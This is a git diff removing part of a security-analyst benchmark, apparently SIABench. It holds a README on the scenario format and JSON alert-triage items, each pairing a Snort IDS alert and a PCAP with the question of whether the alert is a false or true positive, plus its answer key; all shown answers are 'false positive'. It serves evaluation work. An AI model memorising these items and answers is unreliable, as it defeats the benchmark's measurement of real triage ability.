diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset.md b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset.md deleted file mode 100644 index 787cd580547c1b00fe2d7012c13483d99eec9c49..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset.md +++ /dev/null @@ -1,54 +0,0 @@ -## 🎯 Overview - -The following JSON format provides a standardized structure for security incident analysis scenarios. This format enables **Automated evaluation** of LLM agents in alert triaging tasks. - -## Structure Overview - -```json -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_9" - }, - "sia_components": { - "scenario": "Scenario description with alert included", - "alert": "Raw security alert from Snort", - "tools_available": ["tshark", "python", "grep", "..."], - "files_available": "capture.pcap", - "instructions": "Environment setup info", - "directory": "working_directory_path", - "questions": [ - { - "question": "Determine if the alert is false positive or true positive", - "answer": "..." - } - ] - } - } - ] -} -``` - -## Field Descriptions - -### Metadata -- **scenario_name**: Unique identifier for the scenario - -### SIA Components -- **scenario**: Background context for the security incident -- **alert**: Raw alert from IDS/IPS system -- **tools_available**: List of command-line tools for analysis -- **files_available**: Files provided for investigation -- **instructions**: Environment and usage guidelines -- **directory**: Working directory path -- **questions**: Array of questions with expected answers - -## Usage - -**For LLM Input:** Use all fields except `questions[].answer and alert` - -**For Evaluation:** Compare LLM responses against `questions[].answer` - - -**Artifacts:** The PCAP files are given in the following CICIDS - [link](https://drive.google.com/file/d/1a06-pXmFRuCPMQtbt6lqk1Vc7UGnG40m/view?usp=sharing) and TII-SRC - [link](https://drive.google.com/file/d/1tcWJyJf61-aox8hS7q_CgzyXBKc-ustI/view?usp=sharing). Each scenario name corresponds to its respective PCAP folder. diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_1.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_1.json deleted file mode 100644 index 87deb318528ff64702fa3fef09501a9a6933ec68..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_1.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "ds1", - "alert_type": "False", - "alert_name": "false_alert_1" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-12:48:48.967271 [**] [1:1546:18] \"SERVER-WEBAPP Cisco HTTP double-percent DOS attempt\" [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.10.9:4200 -> 151.101.208.166:80", - "alert": "07/03-12:48:48.967271 [**] [1:1546:18] \"SERVER-WEBAPP Cisco HTTP double-percent DOS attempt\" [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.10.9:4200 -> 151.101.208.166:80", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_10.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_10.json deleted file mode 100644 index c6af6df32f02dd3c8e958db08ef274520194c585..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_10.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_2", - "alert_type": "False", - "alert_name": "false_alert_2" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:33:03.601654 [**] [1:1200:17] \"INDICATOR-COMPROMISE Invalid URL\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 104.88.21.85:80 -> 192.168.10.25:49383", - "alert": "07/03-08:33:03.601654 [**] [1:1200:17] \"INDICATOR-COMPROMISE Invalid URL\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 104.88.21.85:80 -> 192.168.10.25:49383", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_11.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_11.json deleted file mode 100644 index 00fd791069b795ab243df591370d8b22a573d63d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_11.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_3", - "alert_type": "False", - "alert_name": "false_alert_3" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:34:11.504893 [**] [1:385:8] \"PROTOCOL-ICMP traceroute\" [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 192.168.10.14 -> 13.107.4.50", - "alert": "07/03-08:34:11.504893 [**] [1:385:8] \"PROTOCOL-ICMP traceroute\" [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 192.168.10.14 -> 13.107.4.50", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_12.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_12.json deleted file mode 100644 index 72b4a31cb68de869ffbd8f27b0050cd60074fc42..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_12.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_4", - "alert_type": "False", - "alert_name": "false_alert_4" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:39:26.328394 [**] [1:649:15] \"INDICATOR-SHELLCODE x86 setgid 0\" [**] [Classification: A system call was detected] [Priority: 2] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "alert": "07/03-08:39:26.328394 [**] [1:649:15] \"INDICATOR-SHELLCODE x86 setgid 0\" [**] [Classification: A system call was detected] [Priority: 2] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_13.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_13.json deleted file mode 100644 index c1a2d2b02919b4c4b1ad256971b3dc5d72678f17..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_13.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_5", - "alert_type": "False", - "alert_name": "false_alert_5" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:45:57.649802 [**] [1:895:19] \"SERVER-WEBAPP redirect access\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.10.9:62876 -> 54.164.201.153:80", - "alert": "07/03-08:45:57.649802 [**] [1:895:19] \"SERVER-WEBAPP redirect access\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.10.9:62876 -> 54.164.201.153:80", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_14.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_14.json deleted file mode 100644 index e7c3213aea17f31fcb35ee4a3f6d36ca767b2754..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_14.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_6", - "alert_type": "False", - "alert_name": "false_alert_6" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:47:50.612239 [**] [1:1010:21] \"SERVER-IIS encoding access\" [**] [Classification: Access to a potentially vulnerable web application] [Priority: 2] {TCP} 192.168.10.9:63310 -> 68.67.178.111:80", - "alert": "07/03-08:47:50.612239 [**] [1:1010:21] \"SERVER-IIS encoding access\" [**] [Classification: Access to a potentially vulnerable web application] [Priority: 2] {TCP} 192.168.10.9:63310 -> 68.67.178.111:80", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_15.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_15.json deleted file mode 100644 index e3e5207342924422ad36a5a269855968e0cf51b9..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_15.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_7", - "alert_type": "False", - "alert_name": "false_alert_7" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-09:42:13.967956 [**] [1:1200:17] \"INDICATOR-COMPROMISE Invalid URL\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 104.88.86.189:80 -> 192.168.10.25:53233", - "alert": "07/03-09:42:13.967956 [**] [1:1200:17] \"INDICATOR-COMPROMISE Invalid URL\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 104.88.86.189:80 -> 192.168.10.25:53233", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_16.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_16.json deleted file mode 100644 index 5cd6e1e0b197fb4140102f32d0589e5e83c4d7b8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_16.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_8", - "alert_type": "False", - "alert_name": "false_alert_8" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-10:25:34.417585 [**] [1:1560:14] \"SERVER-WEBAPP /doc/ access\" [**] [Classification: Access to a potentially vulnerable web application] [Priority: 2] {TCP} 192.168.10.9:2883 -> 23.194.182.116:80", - "alert": "07/03-10:25:34.417585 [**] [1:1560:14] \"SERVER-WEBAPP /doc/ access\" [**] [Classification: Access to a potentially vulnerable web application] [Priority: 2] {TCP} 192.168.10.9:2883 -> 23.194.182.116:80", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_17.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_17.json deleted file mode 100644 index dd9fcb914d13cce62561b9d1b57fb8420000212a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_17.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_9", - "alert_type": "False", - "alert_name": "false_alert_9" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-14:04:29.612732 [**] [1:2667:14] \"SERVER-IIS ping.asp access\" [**] [Classification: Access to a potentially vulnerable web application] [Priority: 2] {TCP} 192.168.10.17:50598 -> 34.205.104.161:80", - "alert": "07/03-14:04:29.612732 [**] [1:2667:14] \"SERVER-IIS ping.asp access\" [**] [Classification: Access to a potentially vulnerable web application] [Priority: 2] {TCP} 192.168.10.17:50598 -> 34.205.104.161:80", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_18.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_18.json deleted file mode 100644 index e4332c2208df598b11d00c371b7800bedaee7b12..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_18.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_3", - "alert_type": "False", - "alert_name": "false_alert_10" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:35:53.528107 [**] [1:648:18] \"INDICATOR-SHELLCODE x86 NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "alert": "07/03-08:35:53.528107 [**] [1:648:18] \"INDICATOR-SHELLCODE x86 NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_19.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_19.json deleted file mode 100644 index bd84f936df68465071211405e0da630d29e77d03..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_19.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_3_1", - "alert_type": "False", - "alert_name": "false_alert_11" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-16:01:23.216669 [**] [122:23:1] \"(port_scan) UDP filtered portsweep\" [**] [Priority: 3] {UDP} 192.168.10.12:8612 -> 192.168.10.255:8610", - "alert": "07/03-16:01:23.216669 [**] [122:23:1] \"(port_scan) UDP filtered portsweep\" [**] [Priority: 3] {UDP} 192.168.10.12:8612 -> 192.168.10.255:8610", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_2.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_2.json deleted file mode 100644 index ceab71443c3f074997ca890366316f73bf57fd3c..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_2.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "ea1", - "alert_type": "False", - "alert_name": "false_alert_12" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/07-09:08:00.277330 [**] [1:40063:5] \"OS-LINUX Linux Kernel Challenge ACK provocation attempt\" [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 192.168.10.25:50189 -> 23.46.180.139:443", - "alert": "07/07-09:08:00.277330 [**] [1:40063:5] \"OS-LINUX Linux Kernel Challenge ACK provocation attempt\" [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 192.168.10.25:50189 -> 23.46.180.139:443", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_20.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_20.json deleted file mode 100644 index f00a81ba300ae31b8c4b8c1d152e5350ff52338d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_20.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_3_2", - "alert_type": "False", - "alert_name": "false_alert_13" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-15:51:04.710387 [**] [122:3:1] \"(port_scan) TCP portsweep\" [**] [Priority: 3] {TCP} 23.203.82.243:443 -> 192.168.10.17:51951", - "alert": "07/03-15:51:04.710387 [**] [122:3:1] \"(port_scan) TCP portsweep\" [**] [Priority: 3] {TCP} 23.203.82.243:443 -> 192.168.10.17:51951", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_21.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_21.json deleted file mode 100644 index 1f54774ff32c582cf6f6c3557f583d054645adc4..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_21.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_3_3", - "alert_type": "False", - "alert_name": "false_alert_14" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-15:50:50.319339 [**] [122:3:1] \"(port_scan) TCP portsweep\" [**] [Priority: 3] {TCP} 192.168.10.25:64668 -> 151.101.20.207:443", - "alert": "07/03-15:50:50.319339 [**] [122:3:1] \"(port_scan) TCP portsweep\" [**] [Priority: 3] {TCP} 192.168.10.25:64668 -> 151.101.20.207:443", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_22.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_22.json deleted file mode 100644 index 00cc824a40f9dfe37efb2ba1a2c142ceec257a97..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_22.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_3_4", - "alert_type": "False", - "alert_name": "false_alert_15" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-15:37:54.031284 [**] [137:1:1] \"(ssl) invalid client HELLO after server HELLO detected\" [**] [Priority: 3] {TCP} 192.168.10.25:63605 -> 192.243.232.58:443", - "alert": "07/03-15:37:54.031284 [**] [137:1:1] \"(ssl) invalid client HELLO after server HELLO detected\" [**] [Priority: 3] {TCP} 192.168.10.25:63605 -> 192.243.232.58:443", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_23.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_23.json deleted file mode 100644 index 2b793612d37467f20ee8766d15df0529ad4d7705..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_23.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_3_5", - "alert_type": "False", - "alert_name": "false_alert_16" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-15:22:56.432352 [**] [122:3:1] \"(port_scan) TCP portsweep\" [**] [Priority: 3] {TCP} 192.168.10.25:61810 -> 81.90.96.10:443", - "alert": "07/03-15:22:56.432352 [**] [122:3:1] \"(port_scan) TCP portsweep\" [**] [Priority: 3] {TCP} 192.168.10.25:61810 -> 81.90.96.10:443", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_24.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_24.json deleted file mode 100644 index 0ef21e600ea047e408d721b346389366922e2cf0..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_24.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_3_6", - "alert_type": "False", - "alert_name": "false_alert_17" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-10:04:59.114288 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 192.168.10.3:389 -> 192.168.10.25:56155", - "alert": "07/03-10:04:59.114288 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 192.168.10.3:389 -> 192.168.10.25:56155", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_25.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_25.json deleted file mode 100644 index 